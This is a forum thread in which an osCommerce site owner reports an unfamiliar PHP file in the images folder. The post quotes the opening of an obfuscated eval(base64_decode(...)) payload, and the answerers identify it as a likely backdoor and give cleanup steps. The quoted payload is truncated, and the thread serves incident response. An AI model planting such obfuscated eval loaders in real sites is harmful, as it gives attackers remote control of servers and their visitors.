Oscommerce Question posted in
The official documentation can be found here

Unexpected PHP file showed up in OSCommerce

Was digging through the OSCommerce files on my site and found a file in the /images folder that I don’t ever remember seeing before. I haven’t checked the original install package, but I suspect this isn’t a part of it.

The file is 27kb and called vidovic_pretty.php. It’s encoded or compiled in some way, so the contents are unviewable. (see below)

<?eval(base64_decode("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7MjUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7...

Running it displays a single html textbox and a button that says, “Check.”

Anyone have any ideas what it is or what it might do?

Thanks

Tags:

5

Answers


  1. 0

    If you can provide the entire string within the base64_decode – Or, actually, instead of calling eval, call echo:

    <?echo base64_decode("JGs9M...");

    You’ll be able to see what it does. But, typically, this is a signature of a backdoor/attacker, etc. I’ve seen this style before. And the fact its in the images/ directory maybe means they were able to get something like photo.gif.php uploaded …

    Probably not good at all.

    Running it displays a single html
    textbox and a button that says,
    “Check.”

    Does it post to a page? Maybe the page receives whatever is in the textbox and executes it via system(), exec(), etc….

    Login or Signup to reply.
  2. 0

    This is most likely something a hacker injected – encoded and minimized. You can echo the result of base64_decode(...) instead of evaluating it to see what it would try to perform. BTW, actually running it was probably a big mistake.

    Login or Signup to reply.
  3. 0

    I have absolutely no doubt in my mind that you have been hacked. You have discovered a backdoor and you must remove it immediately. These are often put in place by automated attack systems and then a hacker can come back at a later date and assume control over your server or use your server to break into web browsers that visit it. I have cleaned up hacks identical to this before. I’m surprised you aren’t on google’s walware list, that is usually peoples first indication.

    I really want to find out the PHP code that is being eval’ed. Can you post the full base64? Maybe split it up by newlines so it will fit.

    Login or Signup to reply.
  4. 0

    Definitely a baddie you got there. As others have pointed out, it most probably serves as a nice backdoor for the attacker to run arbitrary commands on your system.

    What you should, at a bare minimum, do is:

    • Notify your tech support and ask for them to find out what the attacker changed and when
    • If you are on a shared host, move to a dedicated server (or at least a VPS)
    • Back up your data, verifying it’s clean in the process
    • Roll back to a backup made before the box has been compromised
    • Apply any and all security patches to the software you have been running, the OS, etc.
    • Reinstall your scripts then re-import the clean data
    Login or Signup to reply.
  5. 0

    In my PHP framework, I do not allow files to be uploaded that apache might know how to execute upon retrieval.

    If you must print out a thing like this, do it in a CLI version of PHP, don’t send it to your browser! It might also include something that our browser will execute.

    Login or Signup to reply.
Please signup or login to give your own answer.

Back To Top
Search